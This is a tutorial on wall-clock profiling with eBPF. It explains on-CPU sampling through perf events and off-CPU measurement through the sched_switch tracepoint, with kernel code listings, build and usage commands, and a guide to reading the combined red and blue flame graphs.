Wall clock time is the actual elapsed time from start to finish, like checking a stopwatch. For any running process, this time gets divided into two categories. On-CPU time is when your code actively executes on a processor, doing real work. Off-CPU time is when your process exists but isn't running, waiting for something like disk I/O, network packets, or acquiring a lock.

Traditional CPU profilers only show you the on-CPU story. They sample the stack at regular intervals when your code runs, building a picture of which functions consume CPU cycles. But these profilers are blind to off-CPU time. When your thread blocks on a system call or waits for a mutex, the profiler stops seeing it. This creates a massive blind spot for applications that spend significant time waiting.

Off-CPU profilers flip the problem around. They track when threads go to sleep and wake up, measuring blocked time and capturing stack traces at blocking points. This reveals I/O bottlenecks and lock contention. But they miss pure computation problems.

The tools in this tutorial solve both problems by running two eBPF programs simultaneously. The oncputime tool samples on-CPU execution using perf events. The offcputime tool hooks into the kernel scheduler to catch blocking operations. A Python script combines the results, normalizing the time scales so you can see CPU-intensive code paths (marked red) and blocking operations (marked blue) in the same flame graph. This complete view shows where every microsecond goes.

Here's an example flame graph showing combined on-CPU and off-CPU profiling results:

In this visualization, you can clearly see the distinction between CPU-intensive work (shown in red/warm colors marked with _[c]) and blocking operations (shown in blue/cool colors marked with _[o]). The relative widths immediately reveal where your application spends its wall clock time.

The Tools: oncputime and offcputime

This tutorial provides two complementary profiling tools. The oncputime tool samples your process at regular intervals using perf events, capturing stack traces when code actively runs on the CPU. At a default rate of 49 Hz, it wakes up roughly every 20 milliseconds to record where your program is executing. Higher sample counts in the output indicate more CPU time spent in those code paths.

The offcputime tool takes a different approach. It hooks into the kernel scheduler's context switch mechanism, specifically the sched_switch tracepoint. When your thread goes off-CPU, the tool records a timestamp and captures the stack trace showing why it blocked. When the thread returns to running, it calculates how long the thread was sleeping. This directly measures I/O waits, lock contention, and other blocking operations in microseconds.

Both tools use BPF stack maps to efficiently capture kernel and user space call chains with minimal overhead. They aggregate results by unique stack traces, so repeated execution of the same code path gets summed together. The tools can filter by process ID, thread ID, and various other criteria to focus analysis on specific parts of your application.

Implementation: Kernel-Space eBPF Programs

Let's examine how these tools work at the eBPF level. We'll start with the on-CPU profiler, then look at the off-CPU profiler, and see how they complement each other.

On-CPU Profiling with oncputime

The on-CPU profiler uses perf events to sample execution at regular time intervals. Here's the eBPF program (the bpf_map_lookup_or_try_init() helper it calls is not shown in this listing):

// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause)
#include <vmlinux.h>
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_core_read.h>
#include <bpf/bpf_tracing.h>
#include "oncputime.h"

const volatile bool kernel_stacks_only = false;
const volatile bool user_stacks_only = false;
const volatile bool include_idle = false;
const volatile bool filter_by_pid = false;
const volatile bool filter_by_tid = false;

struct {
    __uint(type, BPF_MAP_TYPE_STACK_TRACE);
    __type(key, u32);
} stackmap SEC(".maps");

struct {
    __uint(type, BPF_MAP_TYPE_HASH);
    __type(key, struct key_t);
    __type(value, u64);
    __uint(max_entries, MAX_ENTRIES);
} counts SEC(".maps");

struct {
    __uint(type, BPF_MAP_TYPE_HASH);
    __type(key, u32);
    __type(value, u8);
    __uint(max_entries, MAX_PID_NR);
} pids SEC(".maps");

struct {
    __uint(type, BPF_MAP_TYPE_HASH);
    __type(key, u32);
    __type(value, u8);
    __uint(max_entries, MAX_TID_NR);
} tids SEC(".maps");

SEC("perf_event")
int do_perf_event(struct bpf_perf_event_data *ctx)
{
    u64 *valp;
    static const u64 zero;
    struct key_t key = {};
    u64 id;
    u32 pid;
    u32 tid;

    id = bpf_get_current_pid_tgid();
    pid = id >> 32;
    tid = id;

    if (!include_idle && tid == 0)
        return 0;

    if (filter_by_pid && !bpf_map_lookup_elem(&pids, &pid))
        return 0;

    if (filter_by_tid && !bpf_map_lookup_elem(&tids, &tid))
        return 0;

    key.pid = pid;
    bpf_get_current_comm(&key.name, sizeof(key.name));

    if (user_stacks_only)
        key.kern_stack_id = -1;
    else
        key.kern_stack_id = bpf_get_stackid(&ctx->regs, &stackmap, 0);

    if (kernel_stacks_only)
        key.user_stack_id = -1;
    else
        key.user_stack_id = bpf_get_stackid(&ctx->regs, &stackmap,
                            BPF_F_USER_STACK);

    valp = bpf_map_lookup_or_try_init(&counts, &key, &zero);
    if (valp)
        __sync_fetch_and_add(valp, 1);

    return 0;
}

char LICENSE[] SEC("license") = "GPL";

The program starts by defining several BPF maps. The stackmap is a special map type for storing stack traces. When you call bpf_get_stackid(), the kernel walks the stack and stores the instruction pointers in this map, returning an ID you can use to look it up later. The counts map aggregates samples by a composite key that includes both the process ID and the stack IDs. The pids and tids maps act as filters, letting you restrict profiling to specific processes or threads.

The main logic lives in the do_perf_event() function, which runs every time a perf event fires. The user space program sets up these perf events at a specific frequency (default 49 Hz), one per CPU core. When a CPU triggers its timer, this function executes on whatever process happens to be running at that moment. It first extracts the process and thread IDs from the current task, then applies any configured filters. If the current thread should be sampled, it builds a key structure that includes the process name and stack traces.

The two calls to bpf_get_stackid() capture different pieces of the execution context. The first call without flags gets the kernel stack, showing what kernel functions were active. The second call with BPF_F_USER_STACK gets the user space stack, showing your application's function calls. These stack IDs go into the key, and the program increments a counter for that unique combination. Over time, hot code paths get sampled more frequently, building up higher counts.

Off-CPU Profiling with offcputime

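The off-CPU profiler hooks into the scheduler to measure blocking time. Here's the eBPF program (the tgids and pids filter maps and the get_task_state() helper it references are not shown in this listing):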

// SPDX-License-Identifier: GPL-2.0
#include <vmlinux.h>
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_core_read.h>
#include <bpf/bpf_tracing.h>
#include "offcputime.h"

#define PF_KTHREAD      0x00200000

const volatile bool kernel_threads_only = false;
const volatile bool user_threads_only = false;
const volatile __u64 max_block_ns = -1;
const volatile __u64 min_block_ns = 0;
const volatile bool filter_by_tgid = false;
const volatile bool filter_by_pid = false;
const volatile long state = -1;

struct internal_key {
    u64 start_ts;
    struct key_t key;
};

struct {
    __uint(type, BPF_MAP_TYPE_HASH);
    __type(key, u32);
    __type(value, struct internal_key);
    __uint(max_entries, MAX_ENTRIES);
} start SEC(".maps");

struct {
    __uint(type, BPF_MAP_TYPE_STACK_TRACE);
    __uint(key_size, sizeof(u32));
} stackmap SEC(".maps");

struct {
    __uint(type, BPF_MAP_TYPE_HASH);
    __type(key, struct key_t);
    __type(value, struct val_t);
    __uint(max_entries, MAX_ENTRIES);
} info SEC(".maps");

static bool allow_record(struct task_struct *t)
{
    u32 tgid = BPF_CORE_READ(t, tgid);
    u32 pid = BPF_CORE_READ(t, pid);

    if (filter_by_tgid && !bpf_map_lookup_elem(&tgids, &tgid))
        return false;
    if (filter_by_pid && !bpf_map_lookup_elem(&pids, &pid))
        return false;
    if (user_threads_only && (BPF_CORE_READ(t, flags) & PF_KTHREAD))
        return false;
    else if (kernel_threads_only && !(BPF_CORE_READ(t, flags) & PF_KTHREAD))
        return false;
    if (state != -1 && get_task_state(t) != state)
        return false;
    return true;
}

static int handle_sched_switch(void *ctx, bool preempt, struct task_struct *prev, struct task_struct *next)
{
    struct internal_key *i_keyp, i_key;
    struct val_t *valp, val;
    s64 delta;
    u32 pid;

    if (allow_record(prev)) {
        pid = BPF_CORE_READ(prev, pid);
        if (!pid)
            pid = bpf_get_smp_processor_id();
        i_key.key.pid = pid;
        i_key.key.tgid = BPF_CORE_READ(prev, tgid);
        i_key.start_ts = bpf_ktime_get_ns();

        if (BPF_CORE_READ(prev, flags) & PF_KTHREAD)
            i_key.key.user_stack_id = -1;
        else
            i_key.key.user_stack_id = bpf_get_stackid(ctx, &stackmap, BPF_F_USER_STACK);
        i_key.key.kern_stack_id = bpf_get_stackid(ctx, &stackmap, 0);
        bpf_map_update_elem(&start, &pid, &i_key, 0);
        bpf_probe_read_kernel_str(&val.comm, sizeof(prev->comm), BPF_CORE_READ(prev, comm));
        val.delta = 0;
        bpf_map_update_elem(&info, &i_key.key, &val, BPF_NOEXIST);
    }

    pid = BPF_CORE_READ(next, pid);
    i_keyp = bpf_map_lookup_elem(&start, &pid);
    if (!i_keyp)
        return 0;
    delta = (s64)(bpf_ktime_get_ns() - i_keyp->start_ts);
    if (delta < 0)
        goto cleanup;
    if (delta < min_block_ns || delta > max_block_ns)
        goto cleanup;
    delta /= 1000U;
    valp = bpf_map_lookup_elem(&info, &i_keyp->key);
    if (!valp)
        goto cleanup;
    __sync_fetch_and_add(&valp->delta, delta);

cleanup:
    bpf_map_delete_elem(&start, &pid);
    return 0;
}

SEC("tp_btf/sched_switch")
int BPF_PROG(sched_switch, bool preempt, struct task_struct *prev, struct task_struct *next)
{
    return handle_sched_switch(ctx, preempt, prev, next);
}

char LICENSE[] SEC("license") = "GPL";

The off-CPU profiler is more complex because it needs to track timing across multiple events. The start map stores timestamps and stack information for threads that go off-CPU. When a thread blocks, we record when it happened and why (the stack trace). When that same thread returns to running, we calculate how long it was blocked.

The scheduler switch happens many times per second on a busy system, so performance matters. The allow_record() function quickly filters out threads we don't care about before doing expensive operations. If a thread passes the filter, the program captures the current timestamp using bpf_ktime_get_ns() and records the stack traces showing where the thread blocked.

The key insight is in the two-stage approach. The prev task (the thread going off-CPU) gets its blocking point recorded with a timestamp. When the scheduler later switches to the next task (a thread waking up), we look up whether we previously recorded this thread going to sleep. If we find a record, we calculate the delta between now and when it went to sleep. This delta is the off-CPU time in nanoseconds, which we convert to microseconds and add to the accumulated total for that stack trace.
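The two-stage bookkeeping can be traced in plain C without any kernel involvement. The sketch below is a simplified model under stated assumptions: offcpu_state, on_switch, and MAX_TASKS are hypothetical names, small integer task IDs index fixed arrays instead of BPF hash maps, and a timestamp of 0 means "nothing recorded", so simulated timestamps must be non-zero.

```c
#include <assert.h>
#include <stdint.h>

#define MAX_TASKS 8 /* hypothetical table size for this sketch */

struct offcpu_state {
    uint64_t start_ns[MAX_TASKS]; /* 0 means no switch-out recorded */
    uint64_t total_us[MAX_TASKS]; /* accumulated off-CPU microseconds */
};

/* Models one context switch: prev leaves the CPU, next is scheduled in. */
static void on_switch(struct offcpu_state *s, unsigned prev, unsigned next,
                      uint64_t now_ns)
{
    assert(prev < MAX_TASKS && next < MAX_TASKS && now_ns > 0);

    /* Stage 1: remember when prev went off-CPU. */
    s->start_ns[prev] = now_ns;

    /* Stage 2: if next was switched out earlier, account its blocked time. */
    if (s->start_ns[next] != 0) {
        uint64_t delta_ns = now_ns - s->start_ns[next];
        s->total_us[next] += delta_ns / 1000; /* ns to us, as in the listing */
        s->start_ns[next] = 0;                /* mirrors the map delete */
    }
}
```

Feeding it a switch from task 1 to task 2 at 1 ms and a switch back at 4.5 ms leaves 3500 microseconds accumulated for task 1.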

User-Space Programs: Loading and Processing

Both tools follow a similar pattern in user space. They use libbpf to load the compiled eBPF object file and attach it to the appropriate event. For oncputime, this means setting up perf events at the desired sampling frequency. For offcputime, it means attaching to the scheduler tracepoint. The user space programs then periodically read the BPF maps, resolve the stack IDs to actual function names using symbol tables, and format the output.

The symbol resolution is handled by the blazesym library, which parses DWARF debug information from binaries. When you see a stack trace with function names and line numbers, that's blazesym converting raw instruction pointer addresses into human-readable form. The user space programs output in "folded" format, where each line contains a semicolon-separated stack trace followed by a count or time value. This format feeds directly into flame graph generation tools.
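To make the folded format concrete, here is a minimal sketch that builds one such line from already-resolved frame names. The helper name format_folded is hypothetical, and it assumes the frames arrive leaf-first (the order a stack walk produces) and must be emitted root-first, which is what flame graph tools expect.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Writes "root;...;leaf value" into out. frames[] is leaf-first.
 * Returns 0 on success, -1 if out is too small. */
static int format_folded(char *out, size_t out_len,
                         const char *const *frames, size_t n,
                         unsigned long long value)
{
    size_t used = 0;

    assert(out != NULL && out_len > 0);
    out[0] = '\0';

    /* Walk from the last element (root) down to index 0 (leaf). */
    for (size_t i = n; i-- > 0; ) {
        int w = snprintf(out + used, out_len - used, "%s%s",
                         frames[i], i > 0 ? ";" : "");
        if (w < 0 || (size_t)w >= out_len - used)
            return -1;
        used += (size_t)w;
    }

    /* A single space separates the stack from its count or time value. */
    int w = snprintf(out + used, out_len - used, " %llu", value);
    if (w < 0 || (size_t)w >= out_len - used)
        return -1;
    return 0;
}
```

For the frames read, blocking_work, main and a value of 1500, this yields the line "main;blocking_work;read 1500".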

Combining On-CPU and Off-CPU Profiles

The real power comes from running both tools together and merging their results. The wallclock_profiler.py script orchestrates this process. It launches both profilers simultaneously on the target process, waits for them to complete, and then combines their outputs.

The challenge is that the two tools measure different things in different units. The on-CPU profiler counts samples (49 per second by default), while the off-CPU profiler measures microseconds. To create a unified view, the script normalizes the off-CPU time to equivalent sample counts. If sampling at 49 Hz, each sample represents about 20,408 microseconds of potential execution time. The script divides off-CPU microseconds by this value to get equivalent samples.
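The normalization is simple arithmetic, sketched here in C for consistency with the other listings (the script itself is Python). The function name offcpu_us_to_samples is hypothetical, and rounding to the nearest sample is an assumption; the script may truncate instead.

```c
#include <assert.h>
#include <stdint.h>

/* Convert off-CPU microseconds into equivalent samples at freq_hz.
 * samples = us / (1e6 / hz) = us * hz / 1e6 */
static uint64_t offcpu_us_to_samples(uint64_t offcpu_us, unsigned freq_hz)
{
    assert(freq_hz > 0);
    /* Multiply before dividing to keep precision; +500000 rounds to nearest. */
    return (offcpu_us * freq_hz + 500000) / 1000000;
}
```

At 49 Hz, one second of blocking (1,000,000 microseconds) maps to 49 equivalent samples, so on-CPU and off-CPU widths in the merged flame graph share one scale.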

After normalization, the script adds annotations to distinguish the two types of time. On-CPU stack traces get a _[c] suffix (for compute), while off-CPU stacks get _[o] (for off-CPU or blocking). A custom color palette in the flame graph tool renders these different colors, red for CPU time and blue for blocking time. The result is a single flame graph where you can see both types of activity and their relative magnitudes.

The script also handles multi-threaded applications by profiling each thread separately. It detects threads at startup, launches parallel profiling sessions for each one, and generates individual flame graphs showing per-thread behavior. This helps identify which threads are busy versus idle, and whether your parallelism is effective.

Compilation and Execution

Building the tools requires a standard eBPF development environment. The tutorial repository includes all dependencies in the src/third_party/ directory. To build:

cd src/32-wallclock-profiler
make

The Makefile compiles the eBPF C code with clang, generates skeletons with bpftool, builds the blazesym symbol resolver, and links everything with libbpf to create the final executables.

To use the individual tools:

# Profile on-CPU execution for 30 seconds
sudo ./oncputime -p <PID> -F 99 30

# Profile off-CPU blocking for 30 seconds
sudo ./offcputime -p <PID> -m 1000 30

# Use the combined profiler (recommended)
sudo python3 wallclock_profiler.py <PID> -d 30 -f 99

Let's try profiling a test program that does both CPU work and blocking I/O:

# Build and run the test program
cd tests
make
./test_combined &
TEST_PID=$!

# Profile it with the combined profiler
cd ..
sudo python3 wallclock_profiler.py $TEST_PID -d 30

# This generates:
# - combined_profile_pid<PID>_<timestamp>.folded (raw data)
# - combined_profile_pid<PID>_<timestamp>.svg (flame graph)
# - combined_profile_pid<PID>_<timestamp>_single_thread_analysis.txt (time breakdown)

The output flame graph will show red frames for the cpu_work() function consuming CPU time, and blue frames for the blocking_work() function spending time in sleep. The relative widths show how much wall clock time each consumes.

For multi-threaded applications, the profiler creates a directory with per-thread results:

# Profile a multi-threaded application
sudo python3 wallclock_profiler.py <PID> -d 30

# Output in multithread_combined_profile_pid<PID>_<timestamp>/
# - thread_<TID>_main.svg (main thread flame graph)
# - thread_<TID>_<role>.svg (worker thread flame graphs)
# - *_thread_analysis.txt (time analysis for all threads)

The analysis files show time accounting, letting you verify that on-CPU plus off-CPU time adds up correctly to the wall clock profiling duration. Coverage percentages help identify if threads are mostly idle or if you're missing data.

Interpreting the Results

When you open the flame graph SVG in a browser, each horizontal box represents a function in a stack trace. The width shows how much time was spent there. Boxes stacked vertically show the call chain, with lower boxes calling higher ones. Red boxes indicate on-CPU time, blue boxes show off-CPU time.

Look for wide red sections to find CPU bottlenecks. These are functions burning through cycles in tight loops or expensive algorithms. Wide blue sections indicate blocking operations. Common patterns include file I/O (read/write system calls), network operations (recv/send), and lock contention (futex calls).

The flame graph is interactive. Click any box to zoom in and see details about that subtree. The search function lets you highlight all frames matching a pattern, useful for finding specific functions or libraries. Hovering shows the full function name and exact sample count or time value.

Pay attention to the relative proportions. An application that's 90% blue is I/O bound and probably won't benefit much from CPU optimization. One that's mostly red is CPU bound. Applications split evenly between red and blue might benefit from overlapping computation and I/O, such as using asynchronous I/O or threading.

For multi-threaded profiles, compare the per-thread flame graphs. Ideally, worker threads should show similar patterns if the workload is balanced. If one thread is mostly red while others are mostly blue, you might have load imbalance. If all threads show lots of blue time in futex waits with similar stacks, that's lock contention.

Summary

Wall clock profiling with eBPF gives you complete visibility into application performance by combining on-CPU and off-CPU analysis. The on-CPU profiler samples execution to find hot code paths that consume CPU cycles. The off-CPU profiler hooks into the scheduler to measure blocking time and identify I/O bottlenecks or lock contention. Together, they account for every microsecond of wall clock time, showing where your application actually spends its life.

The tools use eBPF's low-overhead instrumentation to collect this data with minimal impact on the target application. Stack trace capture and aggregation happen in the kernel, avoiding expensive context switches. The user space programs only need to periodically read accumulated results and resolve symbols, which keeps the overhead low enough for many production workloads, although the sched_switch hook still runs on every context switch.

By visualizing both types of time in a single flame graph with color coding, you can quickly identify whether problems are computational or blocking in nature. This guides optimization efforts more effectively than traditional profiling approaches that only show one side of the picture. Multi-threaded profiling support reveals parallelism issues and thread-level bottlenecks.

If you'd like to dive deeper into eBPF, check out our tutorial repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or visit our website at https://eunomia.dev/tutorials/.

References

BCC libbpf-tools offcputime: https://github.com/iovisor/bcc/tree/master/libbpf-tools
BCC libbpf-tools profile: https://github.com/iovisor/bcc/tree/master/libbpf-tools
Blazesym symbol resolution: https://github.com/libbpf/blazesym
FlameGraph visualization: https://github.com/brendangregg/FlameGraph
"Off-CPU Analysis" by Brendan Gregg: http://www.brendangregg.com/offcpuanalysis.html
Coz: Finding Code that Counts with Causal Profiling (SOSP'15): https://dl.acm.org/doi/10.1145/2815400.2815409
wPerf: Generic Off-CPU Analysis (OSDI'18): https://www.usenix.org/system/files/osdi18-zhou.pdf
Identifying On-/Off-CPU Bottlenecks with Blocked Samples (OSDI'24): https://www.usenix.org/system/files/osdi24-ahn.pdf
The Flame Graph (CACM'16): https://queue.acm.org/detail.cfm?id=2927301
Systems Research is Running out of Time (HotOS'21): https://sigops.org/s/conferences/hotos/2021/papers/hotos21-s04-najafi.pdf
Time-Sensitive Linux (OSDI'02): https://www.usenix.org/legacy/event/osdi02/tech/full_papers/goel/goel.pdf
Profiling and Tracing Support for Java Applications (ICPE'19): https://research.spec.org/icpe_proceedings/2019/proceedings/p119.pdf
eBPF Performance Analysis (SIGCOMM'24): https://www.brendangregg.com/Slides/SIGCOMM2024_eBPF_Performance.pdf

The original link of this article: https://eunomia.dev/tutorials/32-wallclock-profiler
